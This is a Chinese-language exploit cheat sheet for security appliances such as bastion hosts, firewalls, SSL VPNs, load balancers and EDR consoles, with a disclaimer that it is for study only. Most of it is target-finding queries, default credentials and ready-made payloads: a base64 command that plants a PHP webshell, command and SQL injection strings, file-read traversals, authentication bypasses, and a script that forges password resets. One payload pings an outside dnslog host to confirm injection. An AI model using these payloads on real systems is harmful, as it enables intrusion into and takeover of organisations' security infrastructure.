Exploits
免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
大纲
身份与访问控制
堡垒机
齐治堡垒机
H3C SecParh
teleport堡垒机
IMC
H3C IMC智能管理中心
网络检测与响应
蜜罐
IDS
绿盟 UTS 综合威胁探针
防火墙
Cisco ASA
网康下一代防火墙
启明星辰 天清汉马USG防火墙
佑友防火墙
zeroshell
Sophos XG
网关
上海格尔安全认证网关管理系统
网康 NS-ASG 安全网关
负载均衡
Citrix ADC
F5 BIG-IP
天融信 Top-app LB
VPN
Fortigate SSL VPN
Palo Alto SSL VPN
Pulse Secure SSL VPN
深信服 VPN
锐捷 SSL VPN
威胁感知
Sophos UTM
终端响应与检测
杀软
EDR
深信服 EDR
360天擎
金山 V8 终端安全系统
数据防泄漏系统
天融信数据防泄漏系统
身份与访问控制
堡垒机
齐治堡垒机
Fofa: app="齐治科技-堡垒机"
默认口令
shterm/shterm
齐治堡垒机 ShtermClient-2.1.1 命令执行漏洞
齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
http://10.20.10.11/listener/cluster_manage.php https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS} /var/www/shterm/resources/qrcode/lbj77.php 密码10086
CNVD-2019-20835 齐治堡垒机前台远程命令执行漏洞
CNVD-2019-17294 齐治堡垒机后台存在命令执行漏洞
远程代码执行
POC | Payload | exp
POST /shterm/listener/tui_update.php a=["t';import os;os.popen('whoami')#"]
任意用户登录漏洞
POC | Payload | exp
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
H3C SecParh
Fofa: app="H3C-SecPath-运维审计系统" && body="2018"
get_detail_view.php 任意用户登录漏洞
POC | Payload | exp
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
teleport堡垒机
fofa: app="TELEPORT堡垒机"
相关文章
任意用户登录漏洞
POC | Payload | exp
后台文件读取
POC | Payload | exp
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
IMC
H3C IMC智能管理中心
远程代码执行
网络检测与响应
蜜罐
相关文章
相关工具
BeichenDream/WhetherMysqlSham - 检测目标 Mysql 数据库是不是蜜罐,获取目标数据库详细信息
Monyer/antiHoneypot - 一个拦截蜜罐 XSSI 的 Chrome 扩展
NS-Sp4ce/MoAn_Honey_Pot_Urls - X安蜜罐用的一些存在JSonp劫持的API
从蓝队溯源角度出发
分析样本
PC 名称
语言
常用函数、方法
注释习惯、变量名习惯
前端漏洞反制
浏览器记录、书签、cookie 等
验证码、手机号、邮箱
攻击时间段
后渗透反制
钓鱼文件
ntlm中继
Rogue MySql Server
从红队角度出发
前台
不支持正常浏览器,仅老版 IE
仅支持老版本 flash
不正常的 JS 文件,js 混淆
仅 json 文件, 内含指纹
XSS、JSONP
大量网络请求
同站同 CMS 不同页面不同时间、CMS 版本
任意口令登录?
要求实名认证、或手机号注册
后渗透
第二次登录后发现 history 记录全部清空
开放了大量端口
docker 容器且无正常业务数据
例如 cat /proc/meminfo 这个命令无论执行多少次得到的内容都是不变的,而这真实的系统中是不可能的。
IDS
相关文章
绿盟 UTS 综合威胁探针
管理员任意登录
POC | Payload | exp
防火墙
Cisco ASA
fofa: app="CISCO-ASA-5520"
CVE-2018-0296 Cisco ASA Directory Traversal
POC | Payload | exp
CVE-2020-3187 任意文件删除
POC | Payload | exp
https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
CVE-2020-3452
描述
Cisco Adaptive Security Appliance (ASA) 防火墙设备以及 Cisco Firepower Threat Defense (FTD)设备的 WEB 管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞,允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件,此漏洞不能用于获取对 ASA 或 FTD 系统文件或底层操作系统 (OS) 文件的访问,所以只能读取 web 系统目录的文件,比如 webvpn 的配置文件、书签、网络 cookies、部分网络内容和超文本传输协议网址等信息。
该漏洞源于 ASA 和 FTD 的 web 服务接口在处理 HTTP 请求的 URL 时缺乏正确的输入验证,导致攻击者可以在目标设备上查看系统内的任意文件。
注意:当设备配置了 WebVPN 或 AnyConnect 功能,启用 Web 服务时,才会受到该漏洞影响,但是该漏洞不能用于访问 ASA 或 FTD 系统文件或底层操作系统 (OS) 文件。
影响
Cisco ASA 设备影响版本:
<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
POC | Payload | exp
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
网康下一代防火墙
fofa: app="网康科技-下一代防火墙"
网康下一代防火墙 RCE
POC | Payload | exp
POST /directdata/direct/router HTTP/1.1 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}访问:https://x.x.x.x/test_test.txt
启明星辰 天清汉马USG防火墙
弱口令
账号:useradmin
密码:venus.user佑友防火墙
默认账号密码
User: admin
Pass: hicomadmin后台命令执行漏洞
系统管理 --> 维护工具 --> Ping
127.0.0.1|cat /etc/passwdzeroshell
rce
Sophos XG
CVE-2020-12271 && CVE-2020-15504
网关
上海格尔安全认证网关管理系统
相关文章
网康 NS-ASG 安全网关
Fofa : 网康 NS-ASG 安全网关
任意文件读取漏洞
POC | Payload | exp
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
负载均衡
Citrix ADC
默认口令
nsroot/nsrootCVE-2019-19781 Citrix Gateway/ADC 远程代码执行漏洞
POC | Payload | exp
F5 BIG-IP
CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞
POC | Payload | exp
CVE-2021-22986 F5 BIG-IP RCE
POC | Payload | exp
CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞
镜像下载
https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.5&container=15.1.5.1_Virtual-Edition
天融信 Top-app LB
SQL注入漏洞
POC | Payload | exp
POST /acc/clsf/report/datasource.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
未授权
POC | Payload | exp
登录框 ; ping xxx.dnslog.info; echo
RCE
POC | Payload | exp
天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀
用户名随意 密码:;id
VPN
Fortigate SSL VPN
fofa: icon_hash="-404383634" app="FORTINET-防火墙"
CVE-2018-13379 Fortigate SSL VPN 密码读取
POC | Payload | exp
CVE-2018-13382 Fortigate SSL VPN 任意密码重置
POC | Payload | exp
CVE-2022-40684 FortiOS Authentication Bypass
POC | Payload | exp
git clone https://github.com/horizon3ai/CVE-2022-40684.git cd CVE-2022-40684 ssh-keygen -t rsa python3 CVE-2022-40684.py -t 1.1.1.1 --username admin --key-file ~/.ssh/id_rsa.pub ssh admin@1.1.1.1
Palo Alto SSL VPN
CVE-2019-1579 Palo Alto GlobalProtect 远程代码执行漏洞
POC | Payload | exp
Pulse Secure SSL VPN
CVE-2019-11510 Pulse Secure SSL VPN 任意文件读取漏洞
POC | Payload | exp
CVE-2019-11539 Pulse Secure SSL VPN 远程代码执行漏洞
POC | Payload | exp
深信服 VPN
常见密码
admin/sangfor@123
sangfor/sangfor
test/test
test1/123456b口令爆破
POC | Payload | exp
https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
用户登录,若多次尝试登录失败会要求输入验证码,若输入错误的验证码,会提示“校验码错误或校验码已过期”;修改登录请求的数据包,清空cookie和验证码字段的值即可绕过验证码,此时提示“用户名或密码错误”。 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
短信绕过
POC | Payload | exp
POST https://路径/por/changetelnum.csp?apiversion=1 newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
任意密码重置
POC | Payload | exp
某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码 利用:需要登录账号 M7.6.6R1版本key为20181118 M7.6.1key为20100720 POST /por/changepwd.csp sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)from Crypto.Cipher import ARC4 from binascii import a2b_hex def myRC4(data, key): rc41= ARC4.new(key) encrypted =rc41.encrypt(data) return encrypted. encode('hex') def rc4_decrpt_hex(data, key): rc41= ARC4. new(key) return rc41. decrypt(a2b_hex(data)) key= '20100720' data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,' print myRC4(data, key)
RCE
影响版本
SSLM7.6.6(20181120)
SSLM7.6.6R1(20181225)
相关文章
POC | Payload | exp
https://x.com/por/checkurl.csp?url=http://127.0.0.1;sleep${IFS}5;&retry=0&timeout=1
锐捷 SSL VPN
FOFA: icon_hash="884334722" || title="Ruijie SSL VPN"
锐捷 SSL VPN 越权访问漏洞
相关文章
POC | Payload | exp
GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1 Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1UserName 参数为已知用户名
Juniper SSL VPN
相关文章
威胁感知
Sophos UTM
CVE-2020-25223-Sophos UTM WebAdmin 远程命令执行漏洞
终端响应与检测
相关文章
EDR/杀软
利用杀毒软件删除任意文件
白名单信任文件
相关文章
clamav
深信服 EDR
相关文章
2020.08命令执行
POC | Payload | exp
2020.09命令执行
POC | Payload | exp
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 {"params":"w=123\"'1234123'\"|命令"}
后台任意用户登陆
POC | Payload | exp
xxx.xxx.xxx.xxx/ui/login.php?user=admin
360天擎
Fofa: title="360天擎"
前台SQL注入
POC | Payload | exp
/api/dp/rptsvcsyncpoint?ccid=1
数据库信息泄露漏洞
POC | Payload | exp
http://x.x.x.x/api/dbstat/gettablessize
金山 V8 终端安全系统
Fofa: title="在线安装-V8+终端安全系统Web控制台"
任意文件读取漏洞
POC | Payload | exp
/htmltopdf/downfile.php?filename=downfile.php
pdf_maker.php 命令执行漏洞
相关文章
POC | Payload | exp
POST /inter/pdf_maker.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
数据防泄漏系统
天融信数据防泄漏系统
越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1